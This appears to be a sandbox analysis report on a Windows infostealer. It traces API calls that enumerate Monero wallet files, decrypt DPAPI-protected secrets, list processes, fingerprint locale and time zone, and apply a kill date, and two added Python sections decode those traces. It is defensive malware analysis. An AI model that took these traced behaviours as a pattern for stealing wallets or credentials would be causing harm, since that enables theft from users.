                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00580C2E), ref: 0056DE5E
                            • StrCmpCA.SHLWAPI(?,005814C8), ref: 0056DEAE
                            • StrCmpCA.SHLWAPI(?,005814CC), ref: 0056DEC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0056E3E0
                            • FindClose.KERNEL32(000000FF), ref: 0056E3F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: a2925b632a7b0b17f33d85f959aaa51d61179cd945ba5ca38a956bef5a8176ec
                            • Instruction ID: 58c79d3ba1f06a7414564d99d5c465cd6bd95b122daf7f46bbe13adf4bd4c14d
                            • Opcode Fuzzy Hash: a2925b632a7b0b17f33d85f959aaa51d61179cd945ba5ca38a956bef5a8176ec
                            • Instruction Fuzzy Hash: D5F1AF718101199ADB15FB60EC9AEEE7738BFD4300F8081D9A51E62091EF346F4ADF66
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: !zg$2z>$7)e$$<z}g$B~$Jv/~$Ssu#$]=.$,{:$tW~
                            • API String ID: 0-4076039871
                            • Opcode ID: b83ea4b43d12a9aac30ea83d901fe9556b01ebad84b0cbf784c446e6853a39d0
                            • Instruction ID: b7bc94f0c8a4c1d3dfb03fc87ac0fe259324e1b2cd6292866cbf4b94d507b0b5
                            • Opcode Fuzzy Hash: b83ea4b43d12a9aac30ea83d901fe9556b01ebad84b0cbf784c446e6853a39d0
                            • Instruction Fuzzy Hash: 2EB228F360C204AFE3046E2DEC85A7AF7E9EF94720F1A853DE6C4C7744EA3558058696
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005814B0,00580C2A), ref: 0056DAEB
                            • StrCmpCA.SHLWAPI(?,005814B4), ref: 0056DB33
                            • StrCmpCA.SHLWAPI(?,005814B8), ref: 0056DB49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0056DDCC
                            • FindClose.KERNEL32(000000FF), ref: 0056DDDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: b3062e3a54a9c0c00db63a6f08e9e302217a020cdd26181eb0f1b6da03d1401a
                            • Instruction ID: bb080df84530006395ffbcd9f29f2b28336b77f33092a64139a7026438e6cb50
                            • Opcode Fuzzy Hash: b3062e3a54a9c0c00db63a6f08e9e302217a020cdd26181eb0f1b6da03d1401a
                            • Instruction Fuzzy Hash: 46913472A00105A7CB14FB74EC5A9EE7B7CBBC4300F40C958B91A97195EE349B19DBA3
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • GetKeyboardLayoutList.USER32(00000000,00000000,005805AF), ref: 00577BE1
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00577BF9
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00577C0D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00577C62
                            • LocalFree.KERNEL32(00000000), ref: 00577D22
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: a3fc92fe6d9e9c2a8f63bd52176eaaebfe5addac31101d08988eaf63e57530fe
                            • Instruction ID: bec6ce700b0b6cbb0092367aae44d4444c5eab0af6ce587dbfa2b55874db0122
                            • Opcode Fuzzy Hash: a3fc92fe6d9e9c2a8f63bd52176eaaebfe5addac31101d08988eaf63e57530fe
                            • Instruction Fuzzy Hash: 48414D7194011CABDB24DB54EC99FEEBB78FF88700F208199E50962181DB342F85DFA2
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00580D73), ref: 0056E4A2
                            • StrCmpCA.SHLWAPI(?,005814F8), ref: 0056E4F2
                            • StrCmpCA.SHLWAPI(?,005814FC), ref: 0056E508
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0056EBDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: 6914498daf46f3a84d547d4406b1f6566f89f2efbc0262b1ab01282b60ccc35e
                            • Instruction ID: 6d6a79f10641a22317b5de98e13c0b587b4c445c3a8071e28b750855890d4c4c
                            • Opcode Fuzzy Hash: 6914498daf46f3a84d547d4406b1f6566f89f2efbc0262b1ab01282b60ccc35e
                            • Instruction Fuzzy Hash: EA1220719101159ADB18FB70EC9AEEE7B38BBD4300F4085A8B51E96091EF346F49DF92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: :[qu$F82$m\w^$K^$M~k$iv
                            • API String ID: 0-1727420772
                            • Opcode ID: 72ad8e7146df4e6bc25f30ec303ae0a8ef35dbfd76b0b5972459937bc50950ec
                            • Instruction ID: e556bd88a482066414feeb586de8052a9c98c1a6c6ace71ce84355bd7a2fa8a5
                            • Opcode Fuzzy Hash: 72ad8e7146df4e6bc25f30ec303ae0a8ef35dbfd76b0b5972459937bc50950ec
                            • Instruction Fuzzy Hash: AFB216F360C2049FE3046E2DEC8567ABBE5EF94720F1A4A3DEAC483744EA3558058797
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NV,00000000,00000000), ref: 00569AEF
                            • LocalAlloc.KERNEL32(00000040,?,?,?,00564EEE,00000000,?), ref: 00569B01
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NV,00000000,00000000), ref: 00569B2A
                            • LocalFree.KERNEL32(?,?,?,?,00564EEE,00000000,?), ref: 00569B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: NV
                            • API String ID: 4291131564-146997974
                            • Opcode ID: 7566ed6847a441baf0317ccab22c645c7cd1ad13ce1c7943b80152b266261d22
                            • Instruction ID: e070f6fa499f45282c231d2aa1195fd294ecbd1e1dbd02df5479c2b9741220fa
                            • Opcode Fuzzy Hash: 7566ed6847a441baf0317ccab22c645c7cd1ad13ce1c7943b80152b266261d22
                            • Instruction Fuzzy Hash: 8B11D2B4640208BFEB01CF64CC95FAA77B9FB89B10F208158F9159B390C7B6A901CB94
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: )R5$[|w$$_Gez$gwn$zY^{
                            • API String ID: 0-383978469
                            • Opcode ID: 7fdfe75f4d30ce9011ff1ff799163302a9701e204fab0dbcf9151054e67f0e00
                            • Instruction ID: 28bd9d3858df868a86ead79d34bad2018685b592a019e9a30b077ebe293204dd
                            • Opcode Fuzzy Hash: 7fdfe75f4d30ce9011ff1ff799163302a9701e204fab0dbcf9151054e67f0e00
                            • Instruction Fuzzy Hash: 1EB2E5F360C2009FE7046E2DEC8567ABBE9EF94720F1A493DE6C5C3744EA3598058697
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0056C871
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0056C87C
                            • lstrcat.KERNEL32(?,00580B46), ref: 0056C943
                            • lstrcat.KERNEL32(?,00580B47), ref: 0056C957
                            • lstrcat.KERNEL32(?,00580B4E), ref: 0056C978
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: 5b075f68556bd1e51ee773588e37737dc93aca8787815123d85b6b5a512d0bbe
                            • Instruction ID: 8942bdd1acace5662d4c365a8148298efac124c35fd281c8868f12cc21c4581c
                            • Opcode Fuzzy Hash: 5b075f68556bd1e51ee773588e37737dc93aca8787815123d85b6b5a512d0bbe
                            • Instruction Fuzzy Hash: 6C41827490421AEFDB50DF90DD89BFEBBB8BB88304F1045A8F509A7280D7746A84CF91
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 0057696C
                            • sscanf.NTDLL ref: 00576999
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005769B2
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005769C0
                            • ExitProcess.KERNEL32 ref: 005769DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: bb4e46c9b31612464e7c6bfe259937dc6b0b495630f37b4546171a75fe7f828c
                            • Instruction ID: 9de0fff9fb009bc98f8521f55ba54004b31e3e03abc55e2fa1c042dd713e2766
                            • Opcode Fuzzy Hash: bb4e46c9b31612464e7c6bfe259937dc6b0b495630f37b4546171a75fe7f828c
                            • Instruction Fuzzy Hash: DA21FF75D00209ABCF44EFE4E9459EEBBB5FF88300F04852EE51AE3250EB345604CB69
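The GetSystemTime / sscanf / SystemTimeToFileTime / SystemTimeToFileTime / ExitProcess sequence in the block above has the shape of a kill-date check: the current time and a date parsed out of an embedded string are both converted to FILETIME and compared, and one side of the comparison ends the process. The Python below is an added example, not code from the Joe Sandbox report or from the sample; it reproduces that arithmetic so the comparison can be checked by hand. The date-string layout ("YYYY-MM-DD" with an optional " HH:MM:SS") is an assumption, since the report does not show the sscanf format string, and the kill date used in the usage block is a constructed value.

```python
"""Added example (not code from the Joe Sandbox report or from the sample): the
GetSystemTime -> sscanf -> SystemTimeToFileTime x2 -> ExitProcess sequence, modelled
as a kill-date check. The date-string layout is an assumption; the report does not
show the sscanf format string."""
import datetime as dt
import re

# FILETIME: 100-nanosecond ticks since 1601-01-01 00:00:00 UTC (what SystemTimeToFileTime returns).
_FILETIME_EPOCH = dt.datetime(1601, 1, 1, tzinfo=dt.timezone.utc)

# Assumed layout of the embedded date string: "YYYY-MM-DD" with an optional " HH:MM:SS".
_KILL_DATE_RE = re.compile(r"^(\d{4})-(\d{2})-(\d{2})(?: (\d{2}):(\d{2}):(\d{2}))?$")


def systemtime_to_filetime(year, month, day, hour=0, minute=0, second=0, millis=0):
    """Same conversion as SystemTimeToFileTime for the SYSTEMTIME fields the sample fills in."""
    t = dt.datetime(year, month, day, hour, minute, second, millis * 1000, tzinfo=dt.timezone.utc)
    micros = (t - _FILETIME_EPOCH) // dt.timedelta(microseconds=1)
    return micros * 10


def filetime_now():
    """GetSystemTime (UTC) followed by SystemTimeToFileTime."""
    now = dt.datetime.now(dt.timezone.utc)
    return systemtime_to_filetime(now.year, now.month, now.day,
                                  now.hour, now.minute, now.second, now.microsecond // 1000)


def parse_kill_date(text):
    """Stand-in for the sscanf call: embedded date string -> FILETIME ticks."""
    m = _KILL_DATE_RE.match(text.strip())
    if m is None:
        raise ValueError(f"kill date does not match the assumed layout: {text!r}")
    fields = [int(g) if g is not None else 0 for g in m.groups()]
    return systemtime_to_filetime(*fields)


def should_exit(kill_date, now_filetime):
    """The branch that reaches ExitProcess: the current FILETIME is past the kill date.
    Both sides are plain 64-bit tick counts, so this is a single integer comparison."""
    return now_filetime > parse_kill_date(kill_date)


if __name__ == "__main__":
    kill = "2024-09-30"  # constructed value, not taken from the sample
    print("kill date as FILETIME:", parse_kill_date(kill))
    print("exit now?", should_exit(kill, filetime_now()))
```

The practical consequence for dynamic analysis: a build whose kill date has passed exits before touching any browser or wallet data, so a sandbox run after that date shows only this block's calls. Running with the system clock set before the kill date is the usual workaround; nothing else in the comparison (no network time, no timezone) has to be spoofed.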
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0056724D
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00567254
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00567281
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005672A4
                            • LocalFree.KERNEL32(?), ref: 005672AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: 0a44d2c41928f5994806334c88d453cfa892e79587af3cb964650295911693c2
                            • Instruction ID: 559d8098c2b4a79f43d77108c0926137ddc062bd7990af8d775aa0e575f562c9
                            • Opcode Fuzzy Hash: 0a44d2c41928f5994806334c88d453cfa892e79587af3cb964650295911693c2
                            • Instruction Fuzzy Hash: C00100B5A40208BBDB10DFD4CD45F9E77B8BB44B04F108554FB05AB2C0D774AA00CB69
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0057961E
                            • Process32First.KERNEL32(00580ACA,00000128), ref: 00579632
                            • Process32Next.KERNEL32(00580ACA,00000128), ref: 00579647
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 0057965C
                            • CloseHandle.KERNEL32(00580ACA), ref: 0057967A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: f98d8466142977668b01265977cef2d83ead960661ebd3eb631293670d0bd49e
                            • Instruction ID: 5f7fe8c5571b00cdc0fc1b2cf7d3f605b916c47ff800cddd83fbe83256b2cff9
                            • Opcode Fuzzy Hash: f98d8466142977668b01265977cef2d83ead960661ebd3eb631293670d0bd49e
                            • Instruction Fuzzy Hash: 13010C75A00208BFCB15DFA5DD48BEEBBF8FB48300F108298A90A97240D7389B44DF61
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,00565184,40000001,00000000,00000000,?,00565184), ref: 00578EC0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: 926a11fc933e8748a1cdfffd1c28b14aef9c19b184bf351a857b61575d8ab986
                            • Instruction ID: 67f9bf773144573dbb559c099e9aaca7c6704206c5a604ac828a586184f9a581
                            • Opcode Fuzzy Hash: 926a11fc933e8748a1cdfffd1c28b14aef9c19b184bf351a857b61575d8ab986
                            • Instruction Fuzzy Hash: 0A110A70240205BFDB00CF64E888FBA3BA9BF89710F10D448FD198B250DB35E841EB64
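The "APIs" lines in the CryptStringToBinaryA/LocalAlloc block, the CryptUnprotectData/WideCharToMultiByte block, the CreateToolhelp32Snapshot/Process32First/Process32Next block and the CryptBinaryToStringA block above all carry their meaning in raw hexadecimal arguments: 00000001 and 40000001 are CRYPT_STRING_* flags, 00000040 is LPTR, 00000002 is TH32CS_SNAPPROCESS, and the 00000001 in CryptUnprotectData's sixth parameter is CRYPTPROTECT_UI_FORBIDDEN. The Python below is an added example, not code from the Joe Sandbox report or from the sample. It parses call lines in exactly the layout the report uses, names those constants (values taken from the Windows SDK headers wincrypt.h, tlhelp32.h and winbase.h), and tags each block with the behaviour its call sequence implies; the behaviour labels are an analyst's reading of the sequences, not something the report states. The sample input is the report's own lines for those four blocks, copied in as constructed test data.

```python
"""Added example (not code from the Joe Sandbox report or from the sample): parse the
"APIs" lines of the function blocks above, name the Win32 constants behind their numeric
arguments, and tag each block with the behaviour its call sequence implies. Constant values
are from the Windows SDK headers (wincrypt.h, tlhelp32.h, winbase.h); the behaviour labels
are an analyst's reading of the call sequences, not something the report states."""
import re

# "• Name.MODULE(arg,arg,...), ref: ADDR"  or  "• Name.MODULE ref: ADDR";
# an optional "Part of subcall function XXXX:" prefix is accepted and dropped.
_CALL_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*(?:ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)
_HEX32 = re.compile(r"[0-9A-Fa-f]{8}")

# CRYPT_STRING_* (wincrypt.h): the low byte is an encoding enum, the high bits are option flags.
_CRYPT_STRING_ENUM = {0: "BASE64HEADER", 1: "BASE64", 2: "BINARY", 3: "BASE64REQUESTHEADER",
                      4: "HEX", 5: "HEXASCII", 6: "BASE64_ANY", 7: "ANY", 8: "HEX_ANY",
                      9: "BASE64X509CRLHEADER", 0xA: "HEXADDR", 0xB: "HEXASCIIADDR", 0xC: "HEXRAW"}
_CRYPT_STRING_BITS = {0x20000000: "STRICT", 0x40000000: "NOCRLF", 0x80000000: "NOCR"}


def crypt_string_flags(value):
    names = ["CRYPT_STRING_" + _CRYPT_STRING_ENUM.get(value & 0xFF, hex(value & 0xFF))]
    names += ["CRYPT_STRING_" + n for bit, n in _CRYPT_STRING_BITS.items() if value & bit]
    return "|".join(names)


# (function, zero-based parameter index) -> decoder for that parameter. GetProcessHeap takes no
# parameters, so the values the report prints next to it are stack residue and get no entry here.
_ARG_DECODERS = {
    ("CryptStringToBinaryA", 2): crypt_string_flags,                       # dwFlags
    ("CryptBinaryToStringA", 2): crypt_string_flags,                       # dwFlags
    ("LocalAlloc", 0): lambda v: {0x00: "LMEM_FIXED", 0x02: "LMEM_MOVEABLE",
                                  0x40: "LPTR (LMEM_FIXED|LMEM_ZEROINIT)",
                                  0x42: "LHND (LMEM_MOVEABLE|LMEM_ZEROINIT)"}.get(v, hex(v)),
    ("CryptUnprotectData", 5): lambda v: "CRYPTPROTECT_UI_FORBIDDEN" if v == 1 else hex(v),
    ("CreateToolhelp32Snapshot", 0): lambda v: "TH32CS_SNAPPROCESS" if v == 2 else hex(v),
    ("WideCharToMultiByte", 0): lambda v: {0: "CP_ACP", 65001: "CP_UTF8"}.get(v, hex(v)),
}

# Call-name sets that, taken together, point at one behaviour.
_BEHAVIOUR_RULES = [
    ({"CryptStringToBinaryA", "LocalAlloc"}, "two-call base64 decode: size query, LocalAlloc, decode"),
    ({"CryptStringToBinaryA"}, "base64 decode of an embedded string"),
    ({"CryptBinaryToStringA"}, "base64 encoding of binary data"),
    ({"CryptUnprotectData", "WideCharToMultiByte"}, "DPAPI unprotect of a stored secret, converted to ANSI"),
    ({"CreateToolhelp32Snapshot", "Process32First", "Process32Next", "StrCmpCA"},
     "process enumeration with name comparison"),
    ({"FindFirstFileA", "FindNextFileA"}, "directory enumeration"),
    ({"GetSystemTime", "SystemTimeToFileTime", "ExitProcess"}, "time comparison that can end the process"),
    ({"GetTimeZoneInformation", "wsprintfA"}, "time-zone fingerprinting"),
]


def parse_call(line):
    """One report line -> dict with func, module, args, ref and symbolic notes; None if not a call line."""
    m = _CALL_RE.match(line)
    if m is None:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    notes = []
    for (func, idx), decode in _ARG_DECODERS.items():
        if func == m["func"] and idx < len(args) and _HEX32.fullmatch(args[idx]):
            value = int(args[idx], 16)
            notes.append(f"arg{idx}=0x{value:X} -> {decode(value)}")
    return {"func": m["func"], "module": m["module"], "args": args, "ref": m["ref"], "notes": notes}


def classify_block(lines):
    """All call lines of one function block -> (parsed calls, behaviour tags)."""
    calls = [c for c in (parse_call(line) for line in lines) if c is not None]
    funcs = {c["func"] for c in calls}
    return calls, [label for required, label in _BEHAVIOUR_RULES if required <= funcs]


# Constructed sample input: the "APIs" lines of four function blocks, copied from the report above.
SAMPLE_BLOCKS = {
    "00569AEF": [
        "• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NV,00000000,00000000), ref: 00569AEF",
        "• LocalAlloc.KERNEL32(00000040,?,?,?,00564EEE,00000000,?), ref: 00569B01",
        "• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NV,00000000,00000000), ref: 00569B2A",
        "• LocalFree.KERNEL32(?,?,?,?,00564EEE,00000000,?), ref: 00569B3F",
    ],
    "00567281": [
        "• GetProcessHeap.KERNEL32(00000008,00000400), ref: 0056724D",
        "• RtlAllocateHeap.NTDLL(00000000), ref: 00567254",
        "• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00567281",
        "• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005672A4",
        "• LocalFree.KERNEL32(?), ref: 005672AE",
    ],
    "0057961E": [
        "• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0057961E",
        "• Process32First.KERNEL32(00580ACA,00000128), ref: 00579632",
        "• Process32Next.KERNEL32(00580ACA,00000128), ref: 00579647",
        "• StrCmpCA.SHLWAPI(?,00000000), ref: 0057965C",
        "• CloseHandle.KERNEL32(00580ACA), ref: 0057967A",
    ],
    "00578EC0": [
        "• CryptBinaryToStringA.CRYPT32(00000000,00565184,40000001,00000000,00000000,?,00565184), ref: 00578EC0",
    ],
}

if __name__ == "__main__":
    for name, lines in SAMPLE_BLOCKS.items():
        calls, tags = classify_block(lines)
        print(f"{name}: {', '.join(tags) or 'no rule matched'}")
        for c in calls:
            for note in c["notes"]:
                print(f"  {c['func']} @ {c['ref']}: {note}")
```

Two details worth reading off the output. The CryptStringToBinaryA pair with LocalAlloc between them is the documented two-call pattern (first call with a NULL output buffer to learn the size, allocate, decode), which is what a hand-written base64 decoder for embedded strings looks like. And 40000001 in CryptBinaryToStringA is BASE64 plus NOCRLF: base64 without line breaks, the form that goes into a URL-encoded or JSON body rather than into a PEM-style file.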
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00E4E008,00000000,?,00580E10,00000000,?,00000000,00000000), ref: 00577A63
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00577A6A
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00E4E008,00000000,?,00580E10,00000000,?,00000000,00000000,?), ref: 00577A7D
                            • wsprintfA.USER32 ref: 00577AB7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: 263e863d066bd9bbb691598beb713b4bc84ed96bfa365fc301d3ce72e018fde7
                            • Instruction ID: 98153bbd68089ff71a04c9a0fbc84fdaacc933341a11c99971d1b94977aa62c1
                            • Opcode Fuzzy Hash: 263e863d066bd9bbb691598beb713b4bc84ed96bfa365fc301d3ce72e018fde7
                            • Instruction Fuzzy Hash: 0D1182B1945218EBEB208F54EC49F69BB78FB45711F1087D5E90AA32C0C7785E40CF51
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
